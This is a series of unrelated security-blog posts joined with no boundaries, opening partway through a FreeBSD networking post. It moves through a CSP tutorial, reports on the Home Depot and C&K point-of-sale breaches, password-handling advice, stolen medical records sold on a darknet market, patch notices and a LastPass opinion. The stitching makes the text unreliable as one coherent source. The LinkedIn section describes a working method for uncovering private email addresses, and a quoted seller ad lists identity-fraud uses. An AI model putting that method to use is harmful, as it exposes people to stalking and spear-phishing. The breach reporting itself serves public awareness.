What's it mean for normal people? Well, it's fixed in FreeBSD-HEAD now. I'm hoping I or someone else will backport it to FreeBSD-10 soon. It fixes my UDP tests - now I hit around 1.3 million packets per second transmit and receive on my test rig; the server now has around 10-15% CPU free. It also fixed issues that Verisign were seeing with their high transaction rate TCP tests. I'm hoping that it fixes the odd corner cases that people have seen with Intel 10 gigabit hardware on FreeBSD and makes LRO generally more useful and stable.

Next up - some code refactoring, then finishing off IPv6 RSS!


I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example how to get IT security right.

The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src; object-src; style-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: * * *; media-src 'none'; frame-src 'self'; font-src; connect-src 'self'

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.


If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.

Home Depot said today that cyber criminals armed with custom-built malware stole an estimated 56 million debit and credit card numbers from its customers between April and September 2014. That disclosure officially makes the incident the largest retail card breach on record.

The disclosure, the first real information about the damage from a data breach that was initially disclosed on this site Sept. 2, also sought to assure customers that the malware used in the breach has been eliminated from its U.S. and Canadian store networks.

“To protect customer data until the malware was eliminated, any terminals identified with malware were taken out of service, and the company quickly put in place other security enhancements,” the company said via press release (PDF). “The hackers’ method of entry has been closed off, the malware has been eliminated from the company’s systems, and the company has rolled out enhanced encryption of payment data to all U.S. stores.”

That “enhanced payment protection,” the company said, involves new payment security protection “that locks down payment data through enhanced encryption, which takes raw payment card information and scrambles it to make it unreadable and virtually useless to hackers.”

“Home Depot’s new encryption technology, provided by Voltage Security, Inc., has been tested and validated by two independent IT security firms,” the statement continues. “The encryption project was launched in January 2014. The rollout was completed in all U.S. stores on Saturday, September 13, 2014. The rollout to Canadian stores will be completed by early 2015.”

The remainder of the statement delves into updated fiscal guidance for investors on what Home Depot believes this breach may cost the company in 2014. But absent from the statement is any further discussion about the timeline of this breach, or information about how forensic investigators believe the attackers may have installed the malware mostly on Home Depot’s self-checkout systems — something which could help explain why this five-month breach involves just 56 million cards instead of many millions more.

As to the timeline, multiple financial institutions report that the alerts they’re receiving from Visa and MasterCard about specific credit and debit cards compromised in this breach suggest that the thieves were stealing card data from Home Depot’s cash registers up until Sept. 7, 2014, a full five days after news of the breach first broke.

The Target breach lasted roughly three weeks, but it exposed some 40 million debit and credit cards because hackers switched on their card-stealing malware during the busiest shopping season of the year. Prior to the Home Depot breach, the record for the largest retail card breach went to TJX, which lost some 45.6 million cards.

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications regard the safety of password as essential and do their best to protect it.

In particular, the developer can affect the security of password
in three manners:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.
I will expand on each of them in order.

Security of server-side key storage

For the secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since it can be a valuable information, it should be especially protected so that even in case of unauthorized access to the system the attacker can not obtain it easily.

This could be achieved through use of key derivation functions, for example. In this case, a derived key is computed from user-provided password and used in the system. With a good design, the password could actually never leave client’s computer — it can be converted straight to the derived key there, and the derived key may be used from this point forward. Therefore, the best than an attacker could get is the derived key with no trivial way of obtaining the original secret.

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.
It is crucial that none of those primitives can be used without proving necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using authentication token that is sent to user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, omitting the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points shortly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of application on public terminals that can’t be trusted being secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.

Best practices for user management of passwords

Server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, he should encourage user to use best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, weak password should merely issue a warning rather than a fatal error.
  2. Using different passwords for separate applications to reduce the damage resulting from an attack resulting in obtaining the secret.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, and also dedicated applications such as KeePass. Example of the latter is Entropass that uses a user-provided master password and salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.
A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there should be a minimum length for a password, it should only focus on withstanding the first round of a brute force attack. Technically saying, any limitation actually reduces entropy since the attacker can safely omit short passwords. However, with the number of possibilities growing incrementally this doesn’t even matter.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst case are the sites that do not support setting your own password, and instead force you to use a password generated using some kind of pseudo-random algorithm. Simply said, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of ASCII printable characters. However, setting the limit much lower may actually reduce the strength of some of user passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for user’s password and how to check the authenticity of the request. This can involve generic instructions involving TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

The malicious software that unknown thieves used to steal credit and debit card numbers in the data breach at Home Depot this year was installed mainly on payment systems in the self-checkout lanes at retail stores, according to sources close to the investigation. The finding could mean thieves stole far fewer cards during the almost five-month breach than they might have otherwise.

A self-checkout lane at a Home Depot in N. Virginia.
Since news of the Home Depot breach first broke on Sept. 2, this publication has been in constant contact with multiple financial institutions that are closely monitoring daily alerts from Visa and MasterCard for reports about new batches of accounts that the card associations believe were compromised in the break-in. Many banks have been bracing for a financial hit that is much bigger than the exposure caused by the breach at Target, which lasted only three weeks and exposed 40 million cards.

But so far, banking sources say Visa and MasterCard have been reporting far fewer compromised cards than expected given the length of the Home Depot exposure.

Sources now tell KrebsOnSecurity that in a conference call with financial institutions today, officials at MasterCard shared several updates from the ongoing forensic investigation into the breach at the nationwide home improvement store chain. The card brand reportedly told banks that at this time it is believed that only self-checkout terminals were impacted in the breach, but stressed that the investigation is far from complete.

MasterCard also reportedly relayed that the investigation to date found evidence of compromise at approximately 1,700 of the nearly 2,200 U.S. stores, with another 112 stores in Canada potentially affected.

Officials at MasterCard declined to comment. Home Depot spokeswoman Paula Drake also declined to comment, except to say that, “Our investigation is continuing, and unfortunately we’re not going to comment on other reports right now.”

How much are your medical records worth in the cybercrime underground? This week, KrebsOnSecurity discovered medical records being sold in bulk for as little as $6.40 apiece. The digital documents, several of which were obtained by sources working with this publication, were apparently stolen from a Texas-based life insurance company that now says it is working with federal authorities on an investigation into a possible data breach.

The “Fraud Related” section of the Evolution Market.
Purloined medical records are among the many illicit goods for sale on the Evolution Market, a black market bazaar that traffics mostly in narcotics and fraud-related goods — including plenty of stolen financial data. Evolution cannot be reached from the regular Internet. Rather, visitors can only browse the site using Tor, software that helps users disguise their identity by bouncing their traffic between different servers, and by encrypting that traffic at every hop along the way.

Last week, a reader alerted this author to a merchant on Evolution Market nicknamed “ImperialRussia” who was advertising medical records for sale. ImperialRussia was hawking his goods as “fullz” — street slang for a package of all the personal and financial records that thieves would need to fraudulently open up new lines of credit in a person’s name.

Each document for sale by this seller includes the would-be identity theft victim’s name, their medical history, address, phone and driver license number, Social Security number, date of birth, bank name, routing number and checking/savings account number. Customers can purchase the records using the digital currency Bitcoin.

A set of five fullz retails for $40 ($8 per record). Buy 20 fullz and the price drops to $7 per record. Purchase 50 or more fullz, and the per record cost falls to just $6.40 — roughly the price of a value meal at a fast food restaurant. Incidentally, even at $8 per record, that’s cheaper than the price most stolen credit cards fetch on the underground markets.

Imperial Russia’s ad pimping medical and financial records stolen from a Texas life insurance firm.
“Live and Exclusive database of US FULLZ from an insurance company, particularly from NorthWestern region of U.S.,” ImperialRussia’s ad on Evolution enthuses. The pitch continues:

“Most of the fullz come with EXTRA FREEBIES inside as additional policyholders. All of the information is accurate and confirmed. Clients are from an insurance company database with GOOD to EXCELLENT credit score! I, myself was able to apply for credit cards valued from $2,000 – $10,000 with my fullz. Info can be used to apply for loans, credit cards, lines of credit, bank withdrawal, assume identity, account takeover.”

Sure enough, the source who alerted me to this listing had obtained numerous fullz from this seller. All of them contained the personal and financial information on people in the Northwest United States (mostly in Washington state) who’d applied for life insurance through American Income Life, an insurance firm based in Waco, Texas.

American Income Life referred all calls to the company’s parent firm — Torchmark Corp., an insurance holding company in McKinney, Texas. This publication shared with Torchmark the records obtained from Imperial Russia. In response, Michael Majors, vice president of investor relations at Torchmark, said that the FBI and Secret Service were assisting the company in an ongoing investigation, and that Torchmark expected to begin the process of notifying affected consumers this week.

“We’re aware of the matter and we’ve been working with law enforcement on an ongoing investigation,” Majors said, after reviewing the documents shared by KrebsOnSecurity. “It looks like we’re working on the same matter that you’re inquiring about.”

Majors declined to answer additional questions, such as whether Torchmark has uncovered the source of the data breach and stopped the leakage of customer records, or when the company believes the breach began. Interestingly, ImperialRussia’s first post offering this data is dated more than three months ago, on June 15, 2014. Likewise, the insurance application documents shared with Torchmark by this publication also were dated mid-2014.

The financial information in the stolen life insurance applications includes the checking and/or savings account information of the applicant, and is collected so that American Income can pre-authorize payments and automatic monthly debits in the event the policy is approved. In a four-page discussion thread on Imperial Russian’s sales page at Evolution, buyers of this stolen data took turns discussing the quality of the information and its various uses, such as how one can use automated phone systems to verify the available balance of an applicant’s bank account.

Jessica Johnson, a Washington state resident whose records were among those sold by ImperialRussia, said in a phone interview that she received a call from a credit bureau this week after identity thieves tried to open two new lines of credit in her name.

“It’s been a nightmare,” she said. “Yesterday, I had all these phone calls from the credit bureau because someone tried to open two new credit cards in my name. And the only reason they called me was because I already had a credit card with that company and the company thought it was weird, I guess.”

ImperialRussia discusses his wares with potential and previous buyers.
More than 1.8 million people were victims of medical ID theft in 2013, according to a report from the Ponemon Institute, an independent research group. I suspect that many of these folks had their medical records stolen and used to open new lines of credit in their names, or to conduct tax refund fraud with the Internal Revenue Service (IRS).

Placing a fraud alert or freeze on your credit file is a great way to block identity thieves from hijacking your good name. For pointers on how to do that, as well as other tips on how to avoid becoming a victim of ID theft, check out this story.

Adobe has released a security update for its Acrobat and PDF Reader products that fixes at least eight critical vulnerabilities in Mac and Windows versions of the software. If you use either of these programs, please take a minute to update now.

Users can manually check for updates by choosing Help > Check for Updates. Adobe Reader users on Windows also can get the latest version here; Mac users, here.

Adobe said it is not aware of exploits or active attacks in the wild against any of the flaws addressed in this update. More information about the patch is available at this link.

For those seeking a lightweight, free alternative to Adobe Reader, check out Sumatra PDF. Foxit Reader is another popular alternative, although it seems to have become less lightweight in recent years.

C&K Systems Inc., a third-party payment vendor blamed for a credit and debit card breach at more than 330 Goodwill locations nationwide, disclosed this week that the intrusion lasted more than 18 months and has impacted at least two other organizations.

On July 21, 2014, this site broke the news that multiple banks were reporting indications that Goodwill Industries had suffered an apparent breach that led to the theft of customer credit and debit card data. Goodwill later confirmed that the breach impacted a portion of its stores, but blamed the incident on an unnamed “third-party vendor.”

Last week, KrebsOnSecurity obtained some internal talking points apparently sent by Goodwill to prepare its member organizations to respond to any calls from the news media about the incident. Those talking points identified the breached third-party vendor as C&K Systems, a retail point-of-sale operator based in Murrells Inlet, S.C.

In response to inquiries from this reporter, C&K released a statement acknowledging that it was informed on July 30 by “an independent security analyst” that its “hosted managed services environment may have experienced unauthorized access.” The company says it then hired an independent cyber investigative team and alerted law enforcement about the incident.

C&K says the investigation determined malicious hackers had access to its systems “intermittently” between Feb. 10, 2013 and Aug. 14, 2014, and that the intrusion led to the the installation of “highly specialized point of sale (POS) infostealer.rawpos malware variant that was undetectable by our security software systems until Sept. 5, 2014,” [link added].

Their statement continues:

“This unauthorized access currently is known to have affected only three (3) customers of C&K, including Goodwill Industries International. While many payment cards may have been compromised, the number of these cards of which we are informed have been used fraudulently is currently less than 25.”

C&K System’s full statement is posted here.


C&K Systems has declined to answer direct questions about this breach. As such, it remains unclear exactly how their systems were compromised, information that could no doubt be helpful to other organizations in preventing future breaches. It’s also not clear whether the other two organizations impacted by this breach have or will disclose.

Here are a few thoughts about why we may not have heard about those other two breaches, and why the source of card breaches can very often go unreported.

Point-of-sale malware, like the malware that hit C&K as well as Target, Home Depot, Neiman Marcus and other retailers this past year, is designed to steal the data encoded onto the magnetic stripe on the backs of debit and credit cards. This data can be used to create counterfeit cards, which are then typically used to purchase physical goods at big-box retailers.

The magnetic stripe on a credit or debit card contains several areas, or “tracks,” where cardholder information is stored: “Track 1″ includes the cardholder’s name, account number and other data. “Track 2,” contains the cardholder’s account, encrypted PIN and other information, but it does not include the account holder’s name.

An example of Track 1 and Track 2 data, together. Source:
Most U.S. states have data breach laws requiring businesses that experience a breach involving the personal and financial information of their citizens to notify those individuals in a timely fashion. However, few of those notification requirements are triggered unless the data that is lost or stolen includes the consumer’s name (see my reporting on the 2012 breach at Global Payments, e.g.).

This is important because a great many of the underground stores that sell stolen credit and debit data only sell Track 2 data. Translation: If the thieves are only stealing Track 2 data, a breached business may not have an obligation under existing state data breach disclosure laws to notify consumers about a security incident that resulted in the theft of their card data.


Breaches like the one at C&K Systems involving stolen mag stripe data will continue for several years to come, even beyond the much-ballyhooed October 2015 liability shift deadline from Visa and MasterCard.

Much of the retail community is working to meet an October 2015 deadline put in place by MasterCard and Visa to move to chip-and-PIN enabled card terminals at their checkout lanes (in most cases, however, this transition will involve the less-secure chip-and-signature approach). Somewhat embarrassingly, the United States is the last of the G20 nations to adopt this technology, which embeds a small computer chip in each card that makes it much more expensive and difficult (but not impossible) for fraudsters to clone stolen cards.

That October 2015 deadline comes with a shift in liability for merchants who haven’t yet adopted chip-and-PIN (i.e., those merchants not in compliance could find themselves responsible for all of the fraudulent charges on purchases involving chip-enabled cards that were instead merely swiped through a regular mag-stripe card reader at checkout time).

Business Week recently ran a story pointing out that Home Depot’s in-store payment system “wasn’t set up to encrypt customers’ credit- and debit-card data, a gap in its defenses that gave potential hackers a wider window to exploit.” The story observed that although Home Depot “this year purchased a tool that would encrypt customer-payment data at the cash register, two of the former managers say current Home Depot staffers have told them that the installation isn’t complete.”

The crazy aspect of all these breaches over the past year is that we’re only hearing about those intrusions that have been detected. In an era when third-party vendors such as C&K Systems can go 18 months without detecting a break-in, it’s reasonable to assume that the problem is much worse than it seems.

Avivah Litan, a fraud analyst with Gartner Inc., said that at least with stolen credit card data there are mechanisms for banks to report a suspected breached merchant to the card associations. At that point, Visa and MasterCard will aggregate the reports to the suspected breached merchant’s bank, and request that the bank demand that the merchant hire a security firm to investigate. But in the case of breaches involving more personal data — such as Social Security numbers and medical information — very often there are few such triggers, and little recourse for affected consumers.

“It’s usually only the credit and debit card stuff that gets exposed,” Litan said. “Nobody cares if the more sensitive personal data is stolen because nobody is damaged by that except you as the consumer, and anyway you probably won’t have any idea how that data was stolen in the first place.”

Maybe it’s best that most breaches go undisclosed: It’s not clear how much consumers could stand if they knew about them all. In an opinion piece published today, New York Times writer Joe Nocera observed that “seven years have passed between the huge T.J. Maxx breach and the huge Home Depot breach — and nothing has changed.” Nocera asks: “Have we become resigned to the idea that, as a condition of modern life, our personal financial data will be hacked on a regular basis? It is sure starting to seem that way.” Breach fatigue, indeed.

The other observation I’d make about these card breaches is that the entire credit card system in the United States seems currently set up so that one party to a transaction can reliably transfer the blame for an incident to another. The main reason the United States has not yet moved to a more secure standard for handling cards, for example, has a lot to do with the finger pointing and blame game that’s been going on for years between the banks and the retail industry. The banks have said, “If the retailers only started installing chip-and-PIN card readers, we’d start issuing those types of cards.” The retailers respond: “Why should we spend the money upgrading all our payment terminals to handle chip-and-PIN when hardly any banks are issuing those types of cards?” And so it has gone for years.

For its part, C&K systems says it was relying on hardware and software that met current security industry standards but that was nevertheless deficient. Happily, the company reports that it is in the process of implementing point-to-point encryption to block any future attacks on its payment infrastructure.

“What we have learned during this process is that we rely and put our trust in many systems and individuals to help prevent these kinds of things from happening. However, there is no 100% failsafe security solution for hosting Point of Sale environments,” C&K Systems said. Their statement continues:

“The software we host for our customers is from a leading POS company and meets current PCI-DSS requirements of encrypted data in transit and data at rest. Point of sale terminals are vulnerable to memory scraping malware, which catches cards in memory before encryption can occur. Our software vendor is in the process of rolling out a full P2PE solution with tokenization that we anticipate receiving in October 2014. Our experience with the state of today’s threats will help all current and future customers develop tighter security measures to help reduce threat exposure and to make them more cognizant of the APTs that exist today and the impact of the potential threat to their businesses.”

Too many organizations only get religion about security after they’ve had a serious security breach, and unfortunately that inaction usually ends up costing the consumer more in the long run. But that doesn’t mean you have to be further victimized in the process: Be smart about your financial habits.

Using a credit card over a debit card, for example, involves fewer hassles and risks when your card information inevitably gets breached by some merchant. Pay close attention to your monthly statements and report any unauthorized charges immediately. And spend more time and energy protecting yourself from identity theft. Finally, take proactive steps to keep your inbox and your computer from being ravaged by cybercrooks.

The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.13, the “Joachim Fuchsberger” release. This release fixes multiple security vulnerabilities, all users of affected phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest versions! A detailed security advisory is available. We also added SQLite3 support, backported from phpMyFAQ 2.9. […]

You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for having "unique" passwords that are actually comprised of a fixed part and a mobile one (which is what I used for the longest time). And let's be clear, using the same base password suffixed with the name of the site you're signing up for is not a protection at all, the moment more than one of your passwords is discovered.

So convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to be) to get the password out of the store, it generates the password in the browser, so I don't have to open a terminal and run pwgen, it runs on my cellphone, so I can use it to fetch the password to type somewhere else, and it even auto-fills my passwords in the Android apps, so I don't have to use a simple password when dealing with some random website that then patches to an app on my phone. But it also has a few good "security conveniences": you can re-encode your Vault on a new master password, you can use a proper OTP pad or a 2FA device to protect it further, and they have some extras such as letting you know if the email you use across services are involved in an account breach.

This does not mean there are no other good password management tools, I know the name of plenty, but I just looked for one that had the features I cared about, and I went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain me more trust. Being open source and audited for a long time, sure, but I don't think either way it's a dealbreaker for me. I mean Chrome itself has a password manager, it just feels not suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get that data.

But the interesting part is how geeks will quickly suggest to just roll your own, be it using some open-source password manager, requiring an external sync system (I did that for sgeps, but it's tied to a single GPG key, so it's not easy for me having two different hardware smartcards), or even your own sync infrastructure. And this is what I really can't stand as an answer, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that, it's hypocritical.

Roll-your-own or host-your-own are, first of all, not going to be options for the people who have no intention to learn how computer systems work — and I can't blame them, I don't want to know how my fridge or dishwasher work, I just want them working. People don't care to learn that you can get file A on computer B, but then if you change it on both while offline you'll have collisions, so now you lost one of the two changes. They either have no time, or just no interest or (but I don't think that happens often) no skill to understand that. And it's not just the random young adult that ends up registering on xtube because they have no idea what it means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to think of the amount of people who think that they have the skills and the time, and then are found lacking one or both of them. Who do you think can protect your content (and passwords) better? A big company with entire teams dedicated to security, or an average 16 years old guy who think he can run the website's forum? — The reference here is to myself: back in 2000/2001 I used to be the forum admin for an Italian gaming community. We got hacked, multiple times, and every time it was for me a new discovery of what security is. At the time third-party forum hosting was reserved to paying customers, and the results have probably been terrible. My personal admin password matched one of my email addresses up until last week and I know for a fact that at least one group of people got access to the password database, where they were stored in plain text.

Yes it is true, targets such as Adobe will lead to many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fishes can lead to just about the same results, if not even better, as you may be lucky and stumble across two passwords for the same account, which allows you to overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to be the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or, both also involved, have no such statement ether.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is very well possible to have a screw up with an open source program as well, if it's misconfigured, or if a vulnerable version don't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason why I don't migrate my blog to WordPress is that I won't ever have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.

One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing.

LinkedIn has built much of its considerable worth on the age-old maxim that “it’s all about who you know.” As a LinkedIn user, you can directly connect with those you attest to knowing professionally or personally, but also you can ask to be introduced to someone you’d like to meet by sending a request through someone who bridges your separate social networks. Celebrities, executives or any other LinkedIn users who wish to avoid unsolicited contact requests may do so by selecting an option that forces the requesting party to supply the personal email address of the intended recipient.

LinkedIn’s entire social fabric begins to unravel if any user can directly connect to any other user, regardless of whether or how their social or professional circles overlap. Unfortunately for LinkedIn (and its users who wish to have their email addresses kept private), this is the exact risk introduced by the company’s built-in efforts to expand the social network’s user base.

According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users.

LinkedIn assumes that if an email address is in your contacts list, that you must already know this person. But what if your entire reason for signing up with LinkedIn is to discover the private email addresses of famous people? All you’d need to do is populate your email account’s contacts list with hundreds of permutations of famous peoples’ names — including combinations of last names, first names and initials — in front of,,, etc. With any luck and some imagination, you may well be on your way to an A-list LinkedIn friends list (or a fantastic set of addresses for spear-phishing, stalking, etc.).

LinkedIn lets you know which of your contacts aren’t members.
When you import your list of contacts from a third-party service or from a stand-alone file, LinkedIn will show you any profiles that match addresses in your contacts list. More significantly, LinkedIn helpfully tells you which email addresses in your contacts lists are not LinkedIn users.

It’s that last step that’s key to finding the email address of the targeted user to whom LinkedIn has just sent a connection request on your behalf. The service doesn’t explicitly tell you that person’s email address, but by comparing your email account’s contact list to the list of addresses that LinkedIn says don’t belong to any users, you can quickly figure out which address(es) on the contacts list correspond to the user(s) you’re trying to find.

Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information. Last month, the two researchers detailed how they were able to de-anonymize posts to Secret, an app-driven online service that allows people to share messages anonymously within their circle of friends, friends of friends, and publicly. In February, Seely more famously demonstrated how to use Google Maps to intercept FBI and Secret Service phone calls.

This time around, the researchers picked on Dallas Mavericks owner Mark Cuban to prove their point with LinkedIn. Using their low-tech hack, the duo was able to locate the Webmail address Cuban had used to sign up for LinkedIn. Seely said they found success in locating the email addresses of other celebrities using the same method about nine times out ten.

“We created several hundred possible addresses for Cuban in a few seconds, using a Microsoft Excel macro,” Seely said. “It’s just a brute-force guessing game, but 90 percent of people are going to use an email address that includes components of their real name.”

The Rhino guys really wanted Cuban’s help in spreading the word about what they’d found, but instead of messaging Cuban directly, Seely pursued a more subtle approach: He knew Cuban’s latest start-up was Cyber Dust, a chat messenger app designed to keep your messages private. So, Seely fired off a tweet complaining that “Facebook Messenger crosses all privacy lines,” and that as  result he was switching to Cyber Dust.

When Mark Cuban retweeted Seely’s endorsement of Cyber Dust, Seely reached out to Cyberdust CEO Ryan Ozonian, letting him know that he’d discovered Cuban’s email address on LinkedIn. In short order, Cuban was asking Rhino to test the security of Cyber Dust.

“Fortunately no major faults were found and those he found are already fixed in the coming update,” Cuban said in an email exchange with KrebsOnSecurity. “I like working with them. They look to help rather than exploit.. We have learned from them and I think their experience will be valuable to other app publishers and networks as well.”

Cory Scott, director of information security at LinkedIn, said very few of the company’s members opt-in to the requirement that all new potential contacts supply the invitee’s email address before sending an invitation to connect. He added that email address-to-user mapping is a fairly common design pattern, and that is is not particularly unique to LinkedIn, and that nothing the company does will prevent people from blasting emails to lists of addresses that might belong to a targeted user, hoping that one of them will hit home.

